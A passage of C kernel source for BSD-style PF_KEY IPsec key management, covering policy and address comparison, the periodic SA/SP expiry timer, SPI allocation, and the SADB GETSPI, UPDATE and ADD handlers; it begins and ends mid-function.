	struct secpolicyindex *spidx1)
{
	/* sanity */
	if (spidx0 == NULL && spidx1 == NULL)
		return 1;

	if (spidx0 == NULL || spidx1 == NULL)
		return 0;

	if (spidx0->prefs != spidx1->prefs ||
	    spidx0->prefd != spidx1->prefd ||
	    spidx0->ul_proto != spidx1->ul_proto)
		return 0;

	/* key_sockaddrcmp(..., 1): ports are significant here */
	return key_sockaddrcmp(&spidx0->src.sa, &spidx1->src.sa, 1) == 0 &&
	       key_sockaddrcmp(&spidx0->dst.sa, &spidx1->dst.sa, 1) == 0;
}

/*
 * compare two secindex structure with mask.
 * IN:
 *	spidx0: source, it is often in SPD.
 *	spidx1: object, it is often from IP header.
* OUT: * 1 : equal * 0 : not equal */ static int key_cmpspidx_withmask( struct secpolicyindex *spidx0, struct secpolicyindex *spidx1) { /* sanity */ if (spidx0 == NULL && spidx1 == NULL) return 1; if (spidx0 == NULL || spidx1 == NULL) return 0; if (spidx0->src.sa.sa_family != spidx1->src.sa.sa_family || spidx0->dst.sa.sa_family != spidx1->dst.sa.sa_family || spidx0->src.sa.sa_len != spidx1->src.sa.sa_len || spidx0->dst.sa.sa_len != spidx1->dst.sa.sa_len) return 0; /* if spidx.ul_proto == IPSEC_ULPROTO_ANY, ignore. */ if (spidx0->ul_proto != (u_int16_t)IPSEC_ULPROTO_ANY && spidx0->ul_proto != spidx1->ul_proto) return 0; switch (spidx0->src.sa.sa_family) { case AF_INET: if (spidx0->src.sin.sin_port != IPSEC_PORT_ANY && spidx0->src.sin.sin_port != spidx1->src.sin.sin_port) return 0; if (!key_bbcmp(&spidx0->src.sin.sin_addr, &spidx1->src.sin.sin_addr, spidx0->prefs)) return 0; break; case AF_INET6: if (spidx0->src.sin6.sin6_port != IPSEC_PORT_ANY && spidx0->src.sin6.sin6_port != spidx1->src.sin6.sin6_port) return 0; /* * scope_id check. if sin6_scope_id is 0, we regard it * as a wildcard scope, which matches any scope zone ID. */ if (spidx0->src.sin6.sin6_scope_id && spidx1->src.sin6.sin6_scope_id && spidx0->src.sin6.sin6_scope_id != spidx1->src.sin6.sin6_scope_id) return 0; if (!key_bbcmp(&spidx0->src.sin6.sin6_addr, &spidx1->src.sin6.sin6_addr, spidx0->prefs)) return 0; break; default: /* XXX */ if (bcmp(&spidx0->src, &spidx1->src, spidx0->src.sa.sa_len) != 0) return 0; break; } switch (spidx0->dst.sa.sa_family) { case AF_INET: if (spidx0->dst.sin.sin_port != IPSEC_PORT_ANY && spidx0->dst.sin.sin_port != spidx1->dst.sin.sin_port) return 0; if (!key_bbcmp(&spidx0->dst.sin.sin_addr, &spidx1->dst.sin.sin_addr, spidx0->prefd)) return 0; break; case AF_INET6: if (spidx0->dst.sin6.sin6_port != IPSEC_PORT_ANY && spidx0->dst.sin6.sin6_port != spidx1->dst.sin6.sin6_port) return 0; /* * scope_id check. 
if sin6_scope_id is 0, we regard it * as a wildcard scope, which matches any scope zone ID. */ if (spidx0->dst.sin6.sin6_scope_id && spidx1->dst.sin6.sin6_scope_id && spidx0->dst.sin6.sin6_scope_id != spidx1->dst.sin6.sin6_scope_id) return 0; if (!key_bbcmp(&spidx0->dst.sin6.sin6_addr, &spidx1->dst.sin6.sin6_addr, spidx0->prefd)) return 0; break; default: /* XXX */ if (bcmp(&spidx0->dst, &spidx1->dst, spidx0->dst.sa.sa_len) != 0) return 0; break; } /* XXX Do we check other field ? e.g. flowinfo */ return 1; } /* returns 0 on match */ static int key_sockaddrcmp( const struct sockaddr *sa1, const struct sockaddr *sa2, int port) { #ifdef satosin #undef satosin #endif #define satosin(s) ((const struct sockaddr_in *)s) #ifdef satosin6 #undef satosin6 #endif #define satosin6(s) ((const struct sockaddr_in6 *)s) if (sa1->sa_family != sa2->sa_family || sa1->sa_len != sa2->sa_len) return 1; switch (sa1->sa_family) { case AF_INET: if (sa1->sa_len != sizeof(struct sockaddr_in)) return 1; if (satosin(sa1)->sin_addr.s_addr != satosin(sa2)->sin_addr.s_addr) { return 1; } if (port && satosin(sa1)->sin_port != satosin(sa2)->sin_port) return 1; break; case AF_INET6: if (sa1->sa_len != sizeof(struct sockaddr_in6)) return 1; /*EINVAL*/ if (satosin6(sa1)->sin6_scope_id != satosin6(sa2)->sin6_scope_id) { return 1; } if (!IN6_ARE_ADDR_EQUAL(&satosin6(sa1)->sin6_addr, &satosin6(sa2)->sin6_addr)) { return 1; } if (port && satosin6(sa1)->sin6_port != satosin6(sa2)->sin6_port) { return 1; } default: if (bcmp(sa1, sa2, sa1->sa_len) != 0) return 1; break; } return 0; #undef satosin #undef satosin6 } /* * compare two buffers with mask. 
 * IN:
 *	addr1: source
 *	addr2: object
 *	bits:  Number of bits to compare
 * OUT:
 *	1 : equal
 *	0 : not equal
 */
static int
key_bbcmp(const void *a1, const void *a2, u_int bits)
{
	const unsigned char *p1 = a1;
	const unsigned char *p2 = a2;

	/* XXX: This could be considerably faster if we compare a word
	 * at a time, but it is complicated on LSB Endian machines */

	/* Handle null pointers */
	if (p1 == NULL || p2 == NULL)
		return (p1 == p2);

	/* compare whole bytes first */
	while (bits >= 8) {
		if (*p1++ != *p2++)
			return 0;
		bits -= 8;
	}

	/* then the leading `bits' bits of the final partial byte */
	if (bits > 0) {
		u_int8_t mask = ~((1<<(8-bits))-1);
		if ((*p1 & mask) != (*p2 & mask))
			return 0;
	}
	return 1;	/* Match! */
}

/*
 * time handler.
 * scanning SPD and SAD to check status for each entries,
 * and do to remove or to expire.
 * Runs periodically (rescheduled via callout_reset at the bottom):
 * reaps DEAD policies, expires policies past their lifetime/validtime,
 * ages LARVAL/MATURE/DYING SAs through their soft and hard lifetimes,
 * and garbage-collects stale (blocked) ACQUIRE entries.
 * XXX: year 2038 problem may remain.
 */
void
key_timehandler(void *unused)
{
	u_int dir;
	time_t now = time_second;
	struct secspacq *spacq, *nextspacq;

	crit_enter();

	/* SPD */
	{
		struct secpolicy *sp, *nextsp;

		for (dir = 0; dir < IPSEC_DIR_MAX; dir++) {
			LIST_FOREACH_MUTABLE(sp, &sptree[dir], chain, nextsp) {
				if (sp->state == IPSEC_SPSTATE_DEAD) {
					KEY_FREESP(&sp);
					continue;
				}

				/* 0 means "no expiry configured" */
				if (sp->lifetime == 0 && sp->validtime == 0)
					continue;

				/* the deletion will occur next time */
				if ((sp->lifetime &&
				     now - sp->created > sp->lifetime) ||
				    (sp->validtime &&
				     now - sp->lastused > sp->validtime)) {
					sp->state = IPSEC_SPSTATE_DEAD;
					key_spdexpire(sp);
					continue;
				}
			}
		}
	}

	/* SAD */
	{
		struct secashead *sah, *nextsah;
		struct secasvar *sav, *nextsav;

		LIST_FOREACH_MUTABLE(sah, &sahtree, chain, nextsah) {
			/* if sah has been dead, then delete it and process next sah. */
			if (sah->state == SADB_SASTATE_DEAD) {
				key_delsah(sah);
				continue;
			}

			/* if LARVAL entry doesn't become MATURE, delete it. */
			LIST_FOREACH_MUTABLE(sav, &sah->savtree[SADB_SASTATE_LARVAL],
					     chain, nextsav) {
				if (now - sav->created > key_larval_lifetime) {
					KEY_FREESAV(&sav);
				}
			}

			/*
			 * check MATURE entry to start to send expire message
			 * whether or not.
			 */
			LIST_FOREACH_MUTABLE(sav, &sah->savtree[SADB_SASTATE_MATURE],
					     chain, nextsav) {
				/* we don't need to check. */
				if (sav->lft_s == NULL)
					continue;

				/* sanity check */
				if (sav->lft_c == NULL) {
					ipseclog((LOG_DEBUG,"key_timehandler: "
						"There is no CURRENT time, why?\n"));
					continue;
				}

				/* check SOFT lifetime */
				if (sav->lft_s->sadb_lifetime_addtime != 0 &&
				    now - sav->created > sav->lft_s->sadb_lifetime_addtime) {
					/*
					 * check SA to be used whether or not.
					 * when SA hasn't been used, delete it.
					 */
					if (sav->lft_c->sadb_lifetime_usetime == 0) {
						key_sa_chgstate(sav, SADB_SASTATE_DEAD);
						KEY_FREESAV(&sav);
					} else {
						key_sa_chgstate(sav, SADB_SASTATE_DYING);
						/*
						 * XXX If we keep to send expire
						 * message in the status of
						 * DYING. Do remove below code.
						 */
						key_expire(sav);
					}
				}
				/* check SOFT lifetime by bytes */
				/*
				 * XXX I don't know the way to delete this SA
				 * when new SA is installed.  Caution when it's
				 * installed too big lifetime by time.
				 */
				else if (sav->lft_s->sadb_lifetime_bytes != 0 &&
				    sav->lft_s->sadb_lifetime_bytes < sav->lft_c->sadb_lifetime_bytes) {
					key_sa_chgstate(sav, SADB_SASTATE_DYING);
					/*
					 * XXX If we keep to send expire
					 * message in the status of
					 * DYING. Do remove below code.
					 */
					key_expire(sav);
				}
			}

			/* check DYING entry to change status to DEAD. */
			LIST_FOREACH_MUTABLE(sav, &sah->savtree[SADB_SASTATE_DYING],
					     chain, nextsav) {
				/* we don't need to check. */
				if (sav->lft_h == NULL)
					continue;

				/* sanity check */
				if (sav->lft_c == NULL) {
					ipseclog((LOG_DEBUG, "key_timehandler: "
						"There is no CURRENT time, why?\n"));
					continue;
				}

				if (sav->lft_h->sadb_lifetime_addtime != 0 &&
				    now - sav->created > sav->lft_h->sadb_lifetime_addtime) {
					key_sa_chgstate(sav, SADB_SASTATE_DEAD);
					KEY_FREESAV(&sav);
				}
#if 0	/* XXX Should we keep to send expire message until HARD lifetime ? */
				else if (sav->lft_s != NULL
				      && sav->lft_s->sadb_lifetime_addtime != 0
				      && now - sav->created > sav->lft_s->sadb_lifetime_addtime) {
					/*
					 * XXX: should be checked to be
					 * installed the valid SA.
					 */

					/*
					 * If there is no SA then sending
					 * expire message.
					 */
					key_expire(sav);
				}
#endif
				/* check HARD lifetime by bytes */
				else if (sav->lft_h->sadb_lifetime_bytes != 0 &&
				    sav->lft_h->sadb_lifetime_bytes < sav->lft_c->sadb_lifetime_bytes) {
					key_sa_chgstate(sav, SADB_SASTATE_DEAD);
					KEY_FREESAV(&sav);
				}
			}

			/* delete entry in DEAD */
			LIST_FOREACH_MUTABLE(sav, &sah->savtree[SADB_SASTATE_DEAD],
					     chain, nextsav) {
				/* sanity check */
				if (sav->state != SADB_SASTATE_DEAD) {
					ipseclog((LOG_DEBUG, "key_timehandler: "
						"invalid sav->state "
						"(queue: %d SA: %d): "
						"kill it anyway\n",
						SADB_SASTATE_DEAD, sav->state));
				}

				/*
				 * do not call key_freesav() here.
				 * sav should already be freed, and sav->refcnt
				 * shows other references to sav
				 * (such as from SPD).
				 */
			}
		}
	}

#ifndef IPSEC_NONBLOCK_ACQUIRE
	/* ACQ tree */
	{
		struct secacq *acq, *nextacq;

		LIST_FOREACH_MUTABLE(acq, &acqtree, chain, nextacq) {
			if (now - acq->created > key_blockacq_lifetime
			 && __LIST_CHAINED(acq)) {
				LIST_REMOVE(acq, chain);
				KFREE(acq);
			}
		}
	}
#endif

	/* SP ACQ tree */
	LIST_FOREACH_MUTABLE(spacq, &spacqtree, chain, nextspacq) {
		if (now - spacq->created > key_blockacq_lifetime
		 && __LIST_CHAINED(spacq)) {
			LIST_REMOVE(spacq, chain);
			KFREE(spacq);
		}
	}

	/* initialize random seed */
	if (key_tick_init_random++ > key_int_random) {
		key_tick_init_random = 0;
		key_srandom();
	}

#ifndef IPSEC_DEBUG2
	/* do exchange to tick time !! */
	callout_reset(&key_timehandler_ch, hz, key_timehandler, NULL);
#endif

	crit_exit();
	return;
}

/*
 * to initialize a seed for random()
 */
static void
key_srandom(void)
{
	skrandom(time_second);
}

/* return one random u_long via key_randomfill() */
u_long
key_random(void)
{
	u_long value;

	key_randomfill(&value, sizeof(value));
	return value;
}

/*
 * Fill `p' with `l' random bytes.  Uses read_random() first and falls
 * back to krandom() for any shortfall, warning once that a
 * pseudo-random generator is being used for IPsec.
 */
void
key_randomfill(void *p, size_t l)
{
	size_t n;
	u_long v;
	static int warn = 1;	/* print the PRNG warning only once */

	n = (size_t)read_random(p, (u_int)l);
	/* last resort */
	while (n < l) {
		v = krandom();
		bcopy(&v, (u_int8_t *)p + n,
		      l - n < sizeof(v) ? l - n : sizeof(v));
		n += sizeof(v);

		if (warn) {
			kprintf("WARNING: pseudo-random number generator "
				"used for IPsec processing\n");
			warn = 0;
		}
	}
}

/*
 * map SADB_SATYPE_* to IPPROTO_*.
 * SADB_SATYPE_UNSPEC is mapped to IPSEC_PROTO_ANY (i.e. ~0).
 * OUT:
 *	0: invalid satype.
 */
static u_int16_t
key_satype2proto(u_int8_t satype)
{
	switch (satype) {
	case SADB_SATYPE_UNSPEC:
		return IPSEC_PROTO_ANY;
	case SADB_SATYPE_AH:
		return IPPROTO_AH;
	case SADB_SATYPE_ESP:
		return IPPROTO_ESP;
	case SADB_X_SATYPE_IPCOMP:
		return IPPROTO_IPCOMP;
	default:
		return 0;
	}
	/* NOTREACHED */
}

/*
 * map IPPROTO_* to SADB_SATYPE_*
 * OUT:
 *	0: invalid protocol type.
 */
static u_int8_t
key_proto2satype(u_int16_t proto)
{
	switch (proto) {
	case IPPROTO_AH:
		return SADB_SATYPE_AH;
	case IPPROTO_ESP:
		return SADB_SATYPE_ESP;
	case IPPROTO_IPCOMP:
		return SADB_X_SATYPE_IPCOMP;
	default:
		return 0;
	}
	/* NOTREACHED */
}

/* %%% PF_KEY */
/*
 * SADB_GETSPI processing is to receive
 *	<base, (SA2), src address, dst address, (SPI range)>
 * from the IKMPd, to assign a unique spi value, to hang on the INBOUND
 * tree with the status of LARVAL, and send
 *	<base, SA(*), address(SD)>
 * to the IKMPd.
 *
 * IN:	mhp: pointer to the pointer to each header.
 * OUT:	NULL if fail.
 *	other if success, return pointer to the message to send.
 */
static int
key_getspi(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp)
{
	struct sadb_address *src0, *dst0;
	struct secasindex saidx;
	struct secashead *newsah;
	struct secasvar *newsav;
	struct sockaddr *saddr, *daddr;
	u_int8_t proto;
	u_int32_t spi;
	u_int8_t mode;
	u_int32_t reqid;
	int error;

	/* sanity check */
	if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL)
		panic("key_getspi: NULL pointer is passed.\n");

	/* src and dst address extensions are mandatory */
	if (mhp->ext[SADB_EXT_ADDRESS_SRC] == NULL ||
	    mhp->ext[SADB_EXT_ADDRESS_DST] == NULL) {
		ipseclog((LOG_DEBUG, "key_getspi: invalid message is passed.\n"));
		return key_senderror(so, m, EINVAL);
	}
	if (mhp->extlen[SADB_EXT_ADDRESS_SRC] < sizeof(struct sadb_address) ||
	    mhp->extlen[SADB_EXT_ADDRESS_DST] < sizeof(struct sadb_address)) {
		ipseclog((LOG_DEBUG, "key_getspi: invalid message is passed.\n"));
		return key_senderror(so, m, EINVAL);
	}
	/* SA2 is optional; default to "any mode", no reqid */
	if (mhp->ext[SADB_X_EXT_SA2] != NULL) {
		mode = ((struct sadb_x_sa2 *)mhp->ext[SADB_X_EXT_SA2])->sadb_x_sa2_mode;
		reqid = ((struct sadb_x_sa2 *)mhp->ext[SADB_X_EXT_SA2])->sadb_x_sa2_reqid;
	} else {
		mode = IPSEC_MODE_ANY;
		reqid = 0;
	}

	src0 = (struct sadb_address *)(mhp->ext[SADB_EXT_ADDRESS_SRC]);
	dst0 = (struct sadb_address *)(mhp->ext[SADB_EXT_ADDRESS_DST]);

	/* map satype to proto */
	if ((proto = key_satype2proto(mhp->msg->sadb_msg_satype)) == 0) {
		ipseclog((LOG_DEBUG, "key_getspi: invalid satype is passed.\n"));
		return key_senderror(so, m, EINVAL);
	}

	/*
	 * make sure if port number is zero.
	 * (the sockaddrs follow their sadb_address headers in the mbuf;
	 * ports are forced to 0 in place since SAs are not per-port)
	 */
	saddr = (struct sockaddr *)(src0 + 1);
	daddr = (struct sockaddr *)(dst0 + 1);
	switch (saddr->sa_family) {
	case AF_INET:
		if (saddr->sa_len != sizeof(struct sockaddr_in))
			return key_senderror(so, m, EINVAL);
		((struct sockaddr_in *)(src0 + 1))->sin_port = 0;
		break;
	case AF_INET6:
		if (saddr->sa_len != sizeof(struct sockaddr_in6))
			return key_senderror(so, m, EINVAL);
		((struct sockaddr_in6 *)(src0 + 1))->sin6_port = 0;
		break;
	default:
		; /*???*/
	}
	switch (daddr->sa_family) {
	case AF_INET:
		if (daddr->sa_len != sizeof(struct sockaddr_in))
			return key_senderror(so, m, EINVAL);
		((struct sockaddr_in *)(dst0 + 1))->sin_port = 0;
		break;
	case AF_INET6:
		if (daddr->sa_len != sizeof(struct sockaddr_in6))
			return key_senderror(so, m, EINVAL);
		((struct sockaddr_in6 *)(dst0 + 1))->sin6_port = 0;
		break;
	default:
		; /*???*/
	}

	/* XXX boundary check against sa_len */
	KEY_SETSECASIDX(proto, mode, reqid, src0 + 1, dst0 + 1, &saidx);

	/* SPI allocation */
	spi = key_do_getnewspi((struct sadb_spirange *)mhp->ext[SADB_EXT_SPIRANGE],
	                       &saidx);
	if (spi == 0)
		return key_senderror(so, m, EINVAL);

	/* get a SA index */
	if ((newsah = key_getsah(&saidx)) == NULL) {
		/* create a new SA index */
		if ((newsah = key_newsah(&saidx)) == NULL) {
			ipseclog((LOG_DEBUG, "key_getspi: No more memory.\n"));
			return key_senderror(so, m, ENOBUFS);
		}
	}

	/* get a new SA */
	/* XXX rewrite */
	newsav = KEY_NEWSAV(m, mhp, newsah, &error);
	if (newsav == NULL) {
		/* XXX don't free new SA index allocated in above. */
		return key_senderror(so, m, error);
	}

	/* set spi */
	newsav->spi = htonl(spi);

#ifndef IPSEC_NONBLOCK_ACQUIRE
	/* delete the entry in acqtree */
	if (mhp->msg->sadb_msg_seq != 0) {
		struct secacq *acq;
		if ((acq = key_getacqbyseq(mhp->msg->sadb_msg_seq)) != NULL) {
			/* reset counter in order to deletion by timehandler. */
			acq->created = time_second;
			acq->count = 0;
		}
	}
#endif

    {
	struct mbuf *n;
	struct sadb_sa *m_sa;
	struct sadb_msg *newmsg;
	int off, len;

	/* create new sadb_msg to reply. */
	len = PFKEY_ALIGN8(sizeof(struct sadb_msg)) +
	    PFKEY_ALIGN8(sizeof(struct sadb_sa));
	if (len > MCLBYTES)
		return key_senderror(so, m, ENOBUFS);

	n = m_getb(len, MB_DONTWAIT, MT_DATA, M_PKTHDR);
	if (!n)
		return key_senderror(so, m, ENOBUFS);

	n->m_len = len;
	/* copy the request's base header, then append the assigned SA ext */
	m_copydata(m, 0, sizeof(struct sadb_msg), mtod(n, caddr_t));

	off = PFKEY_ALIGN8(sizeof(struct sadb_msg));

	m_sa = (struct sadb_sa *)(mtod(n, caddr_t) + off);
	m_sa->sadb_sa_len = PFKEY_UNIT64(sizeof(struct sadb_sa));
	m_sa->sadb_sa_exttype = SADB_EXT_SA;
	m_sa->sadb_sa_spi = htonl(spi);
	off += PFKEY_ALIGN8(sizeof(struct sadb_sa));

#ifdef DIAGNOSTIC
	if (off != len)
		panic("length inconsistency in key_getspi");
#endif

	n->m_next = key_gather_mbuf(m, mhp, 0, 2, SADB_EXT_ADDRESS_SRC,
	    SADB_EXT_ADDRESS_DST);
	if (!n->m_next) {
		m_freem(n);
		return key_senderror(so, m, ENOBUFS);
	}

	if (n->m_len < sizeof(struct sadb_msg)) {
		n = m_pullup(n, sizeof(struct sadb_msg));
		if (n == NULL)
			/*
			 * NOTE(review): on m_pullup failure this sends the
			 * original request `m' back up instead of an error
			 * reply; looks suspicious but is long-standing
			 * behavior — confirm before changing.
			 */
			return key_sendup_mbuf(so, m, KEY_SENDUP_ONE);
	}

	n->m_pkthdr.len = m_lengthm(n, NULL);
	newmsg = mtod(n, struct sadb_msg *);
	newmsg->sadb_msg_seq = newsav->seq;
	newmsg->sadb_msg_errno = 0;
	newmsg->sadb_msg_len = PFKEY_UNIT64(n->m_pkthdr.len);

	m_freem(m);
	return key_sendup_mbuf(so, n, KEY_SENDUP_ONE);
    }
}

/*
 * allocating new SPI
 * called by key_getspi().
 * OUT:
 *	0: failure.
 *	others: success.
*/ static u_int32_t key_do_getnewspi(struct sadb_spirange *spirange, struct secasindex *saidx) { u_int32_t newspi; u_int32_t min, max; int count = key_spi_trycnt; /* set spi range to allocate */ if (spirange != NULL) { min = spirange->sadb_spirange_min; max = spirange->sadb_spirange_max; } else { min = key_spi_minval; max = key_spi_maxval; } /* IPCOMP needs 2-byte SPI */ if (saidx->proto == IPPROTO_IPCOMP) { u_int32_t t; if (min >= 0x10000) min = 0xffff; if (max >= 0x10000) max = 0xffff; if (min > max) { t = min; min = max; max = t; } } if (min == max) { if (key_checkspidup(saidx, min) != NULL) { ipseclog((LOG_DEBUG, "key_do_getnewspi: SPI %u exists already.\n", min)); return 0; } count--; /* taking one cost. */ newspi = min; } else { /* init SPI */ newspi = 0; /* when requesting to allocate spi ranged */ while (count--) { /* generate pseudo-random SPI value ranged. */ newspi = min + (key_random() % (max - min + 1)); if (key_checkspidup(saidx, newspi) == NULL) break; } if (count == 0 || newspi == 0) { ipseclog((LOG_DEBUG, "key_do_getnewspi: to allocate spi is failed.\n")); return 0; } } /* statistics */ keystat.getspi_count = (keystat.getspi_count + key_spi_trycnt - count) / 2; return newspi; } /* * SADB_UPDATE processing * receive * <base, SA, (SA2), (lifetime(HSC),) address(SD), (address(P),) * key(AE), (identity(SD),) (sensitivity)> * from the ikmpd, and update a secasvar entry whose status is SADB_SASTATE_LARVAL. * and send * <base, SA, (SA2), (lifetime(HSC),) address(SD), (address(P),) * (identity(SD),) (sensitivity)> * to the ikmpd. * * m will always be freed. 
 */
static int
key_update(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp)
{
	struct sadb_sa *sa0;
	struct sadb_address *src0, *dst0;
	struct secasindex saidx;
	struct secashead *sah;
	struct secasvar *sav;
	u_int16_t proto;
	u_int8_t mode;
	u_int32_t reqid;
	int error;

	/* sanity check */
	if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL)
		panic("key_update: NULL pointer is passed.\n");

	/* map satype to proto */
	if ((proto = key_satype2proto(mhp->msg->sadb_msg_satype)) == 0) {
		ipseclog((LOG_DEBUG, "key_update: invalid satype is passed.\n"));
		return key_senderror(so, m, EINVAL);
	}

	/*
	 * Required extensions: SA, src/dst addresses, the key matching
	 * the SA type (ESP needs an encryption key, AH an auth key), and
	 * HARD/SOFT lifetimes must come as a pair or not at all.
	 */
	if (mhp->ext[SADB_EXT_SA] == NULL ||
	    mhp->ext[SADB_EXT_ADDRESS_SRC] == NULL ||
	    mhp->ext[SADB_EXT_ADDRESS_DST] == NULL ||
	    (mhp->msg->sadb_msg_satype == SADB_SATYPE_ESP &&
	     mhp->ext[SADB_EXT_KEY_ENCRYPT] == NULL) ||
	    (mhp->msg->sadb_msg_satype == SADB_SATYPE_AH &&
	     mhp->ext[SADB_EXT_KEY_AUTH] == NULL) ||
	    (mhp->ext[SADB_EXT_LIFETIME_HARD] != NULL &&
	     mhp->ext[SADB_EXT_LIFETIME_SOFT] == NULL) ||
	    (mhp->ext[SADB_EXT_LIFETIME_HARD] == NULL &&
	     mhp->ext[SADB_EXT_LIFETIME_SOFT] != NULL)) {
		ipseclog((LOG_DEBUG, "key_update: invalid message is passed.\n"));
		return key_senderror(so, m, EINVAL);
	}
	if (mhp->extlen[SADB_EXT_SA] < sizeof(struct sadb_sa) ||
	    mhp->extlen[SADB_EXT_ADDRESS_SRC] < sizeof(struct sadb_address) ||
	    mhp->extlen[SADB_EXT_ADDRESS_DST] < sizeof(struct sadb_address)) {
		ipseclog((LOG_DEBUG, "key_update: invalid message is passed.\n"));
		return key_senderror(so, m, EINVAL);
	}
	/* SA2 is optional; default to "any mode", no reqid */
	if (mhp->ext[SADB_X_EXT_SA2] != NULL) {
		mode = ((struct sadb_x_sa2 *)mhp->ext[SADB_X_EXT_SA2])->sadb_x_sa2_mode;
		reqid = ((struct sadb_x_sa2 *)mhp->ext[SADB_X_EXT_SA2])->sadb_x_sa2_reqid;
	} else {
		mode = IPSEC_MODE_ANY;
		reqid = 0;
	}
	/* XXX boundary checking for other extensions */

	sa0 = (struct sadb_sa *)mhp->ext[SADB_EXT_SA];
	src0 = (struct sadb_address *)(mhp->ext[SADB_EXT_ADDRESS_SRC]);
	dst0 = (struct sadb_address *)(mhp->ext[SADB_EXT_ADDRESS_DST]);

	/* XXX boundary check against sa_len */
	KEY_SETSECASIDX(proto, mode, reqid, src0 + 1, dst0 + 1, &saidx);

	/* get a SA header */
	if ((sah = key_getsah(&saidx)) == NULL) {
		ipseclog((LOG_DEBUG, "key_update: no SA index found.\n"));
		return key_senderror(so, m, ENOENT);
	}

	/* set spidx if there */
	/* XXX rewrite */
	error = key_setident(sah, m, mhp);
	if (error)
		return key_senderror(so, m, error);

	/* find a SA with sequence number. */
#ifdef IPSEC_DOSEQCHECK
	if (mhp->msg->sadb_msg_seq != 0 &&
	    (sav = key_getsavbyseq(sah, mhp->msg->sadb_msg_seq)) == NULL) {
		ipseclog((LOG_DEBUG,
		    "key_update: no larval SA with sequence %u exists.\n",
		    mhp->msg->sadb_msg_seq));
		return key_senderror(so, m, ENOENT);
	}
#else
	/* without sequence checking the SA is located by SPI alone */
	if ((sav = key_getsavbyspi(sah, sa0->sadb_sa_spi)) == NULL) {
		ipseclog((LOG_DEBUG,
		    "key_update: no such a SA found (spi:%u)\n",
		    (u_int32_t)ntohl(sa0->sadb_sa_spi)));
		return key_senderror(so, m, EINVAL);
	}
#endif

	/* validity check */
	if (sav->sah->saidx.proto != proto) {
		ipseclog((LOG_DEBUG,
		    "key_update: protocol mismatched (DB=%u param=%u)\n",
		    sav->sah->saidx.proto, proto));
		return key_senderror(so, m, EINVAL);
	}
#ifdef IPSEC_DOSEQCHECK
	if (sav->spi != sa0->sadb_sa_spi) {
		ipseclog((LOG_DEBUG,
		    "key_update: SPI mismatched (DB:%u param:%u)\n",
		    (u_int32_t)ntohl(sav->spi),
		    (u_int32_t)ntohl(sa0->sadb_sa_spi)));
		return key_senderror(so, m, EINVAL);
	}
#endif
	/* only the process that created the larval SA may update it */
	if (sav->pid != mhp->msg->sadb_msg_pid) {
		ipseclog((LOG_DEBUG,
		    "key_update: pid mismatched (DB:%u param:%u)\n",
		    sav->pid, mhp->msg->sadb_msg_pid));
		return key_senderror(so, m, EINVAL);
	}

	/* copy sav values */
	error = key_setsaval(sav, m, mhp);
	if (error) {
		KEY_FREESAV(&sav);
		return key_senderror(so, m, error);
	}

	/* check SA values to be mature. */
	if ((mhp->msg->sadb_msg_errno = key_mature(sav)) != 0) {
		KEY_FREESAV(&sav);
		return key_senderror(so, m, 0);
	}

    {
	struct mbuf *n;

	/* set msg buf from mhp */
	n = key_getmsgbuf_x1(m, mhp);
	if (n == NULL) {
		ipseclog((LOG_DEBUG, "key_update: No more memory.\n"));
		return key_senderror(so, m, ENOBUFS);
	}

	m_freem(m);
	return key_sendup_mbuf(so, n, KEY_SENDUP_ALL);
    }
}

/*
 * search SAD with sequence for a SA which state is SADB_SASTATE_LARVAL.
 * only called by key_update().
 * OUT:
 *	NULL	: not found
 *	others	: found, pointer to a SA.
 */
#ifdef IPSEC_DOSEQCHECK
static struct secasvar *
key_getsavbyseq(struct secashead *sah, u_int32_t seq)
{
	struct secasvar *sav;
	u_int state;

	state = SADB_SASTATE_LARVAL;

	/* search SAD with sequence number ? */
	LIST_FOREACH(sav, &sah->savtree[state], chain) {
		KEY_CHKSASTATE(state, sav->state, "key_getsabyseq");

		if (sav->seq == seq) {
			SA_ADDREF(sav);	/* caller receives a reference */
			KEYDEBUG(KEYDEBUG_IPSEC_STAMP,
				kprintf("DP key_getsavbyseq cause "
					"refcnt++:%d SA:%p\n",
					sav->refcnt, sav));
			return sav;
		}
	}

	return NULL;
}
#endif

/*
 * SADB_ADD processing
 * add an entry to SA database, when received
 *   <base, SA, (SA2), (lifetime(HSC),) address(SD), (address(P),)
 *   key(AE), (identity(SD),) (sensitivity)>
 * from the ikmpd,
 * and send
 *   <base, SA, (SA2), (lifetime(HSC),) address(SD), (address(P),)
 *   (identity(SD),) (sensitivity)>
 * to the ikmpd.
 *
 * IGNORE identity and sensitivity messages.
 *
 * m will always be freed.
*/
/*
 * SADB_ADD processing: install a fully-specified SA (SPI already chosen,
 * keys supplied) into the SAD on behalf of the IKE daemon.
 * On success the request message is echoed to all PF_KEY listeners.
 * m will always be freed (either directly or via key_senderror()).
 */
static int
key_add(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp)
{
	struct sadb_sa *sa0;
	struct sadb_address *src0, *dst0;
	struct secasindex saidx;
	struct secashead *newsah;
	struct secasvar *newsav;
	u_int16_t proto;
	u_int8_t mode;
	u_int32_t reqid;
	int error;

	/* sanity check */
	if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL)
		panic("key_add: NULL pointer is passed.\n");

	/* map satype to proto */
	if ((proto = key_satype2proto(mhp->msg->sadb_msg_satype)) == 0) {
		ipseclog((LOG_DEBUG, "key_add: invalid satype is passed.\n"));
		return key_senderror(so, m, EINVAL);
	}

	/*
	 * Mandatory extensions: SA, src/dst addresses; an ESP SA must carry
	 * an encryption key and an AH SA an auth key; HARD and SOFT
	 * lifetimes must be given together or not at all.
	 */
	if (mhp->ext[SADB_EXT_SA] == NULL ||
	    mhp->ext[SADB_EXT_ADDRESS_SRC] == NULL ||
	    mhp->ext[SADB_EXT_ADDRESS_DST] == NULL ||
	    (mhp->msg->sadb_msg_satype == SADB_SATYPE_ESP &&
	     mhp->ext[SADB_EXT_KEY_ENCRYPT] == NULL) ||
	    (mhp->msg->sadb_msg_satype == SADB_SATYPE_AH &&
	     mhp->ext[SADB_EXT_KEY_AUTH] == NULL) ||
	    (mhp->ext[SADB_EXT_LIFETIME_HARD] != NULL &&
	     mhp->ext[SADB_EXT_LIFETIME_SOFT] == NULL) ||
	    (mhp->ext[SADB_EXT_LIFETIME_HARD] == NULL &&
	     mhp->ext[SADB_EXT_LIFETIME_SOFT] != NULL)) {
